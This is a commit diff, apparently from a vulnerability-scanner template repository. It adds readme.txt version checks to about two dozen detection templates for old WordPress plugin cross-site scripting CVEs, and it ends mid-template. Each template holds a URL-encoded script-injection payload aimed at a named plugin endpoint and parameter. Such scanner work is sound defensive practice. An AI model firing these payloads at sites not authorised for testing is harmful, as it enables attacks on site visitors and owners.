Wordpress FP Fix
parent
2ede6795a6
commit
c68dd7249c
|
@ -30,7 +30,20 @@ info:
|
||||||
product: sniplets_plugin
|
product: sniplets_plugin
|
||||||
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
|
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Code Snippets'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
|
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
|
||||||
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
|
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Grand Flagallery'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/adminimize/"
|
google-query: inurl:"/wp-content/plugins/adminimize/"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
|
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Adminimize ==='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/skysa-official/"
|
google-query: inurl:"/wp-content/plugins/skysa-official/"
|
||||||
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
|
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Skysa App'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
|
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
|
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'ClickDesk Live Support - Live Chat'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -27,7 +27,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
|
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
|
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Featurific For Wordpress'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
|
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
|
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'All-in-One Event Calendar'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
product: wp-facethumb
|
product: wp-facethumb
|
||||||
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
|
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'WP-FaceThumb ==='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -26,7 +26,20 @@ info:
|
||||||
product: mf_gig_calendar
|
product: mf_gig_calendar
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
|
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'MF Gig Calendar ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -30,7 +30,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
|
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
|
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- '2 Click Social Media Buttons'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
|
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Download Monitor ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
product: wordpress_integrator
|
product: wordpress_integrator
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
|
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Wordpress Integrator'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||||
|
|
|
@ -27,7 +27,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/uploader"
|
google-query: inurl:"/wp-content/plugins/uploader"
|
||||||
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
|
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Uploader'
|
||||||
|
- "Tags:"
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,17 +29,32 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
|
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
|
||||||
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
|
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'traffic analy'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<script>alert(1)</script>"
|
- "<script>alert(document.domain)</script>"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
|
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
|
||||||
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
|
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Category Grid View Gallery ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/duplicator"
|
google-query: inurl:"/wp-content/plugins/duplicator"
|
||||||
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
|
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Duplicator - WordPress Migration'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
|
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
|
||||||
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
|
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'ActiveHelper LiveHelp Live Chat'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||||
|
|
|
@ -30,7 +30,23 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
|
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
|
||||||
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
|
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Infusionsoft'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||||
|
|
|
@ -28,7 +28,22 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
|
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/movies/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Movies ='
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||||
|
|
|
@ -29,7 +29,22 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
|
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Ultimate Weather'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
|
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
|
||||||
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
|
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Video Gallery WordPress DZS'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
||||||
|
|
|
@ -30,7 +30,7 @@ info:
|
||||||
vendor: ab_google_map_travel_project
|
vendor: ab_google_map_travel_project
|
||||||
product: ab_google_map_travel
|
product: ab_google_map_travel
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project
|
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -31,7 +31,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
|
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
|
||||||
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
|
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Navis'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
|
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
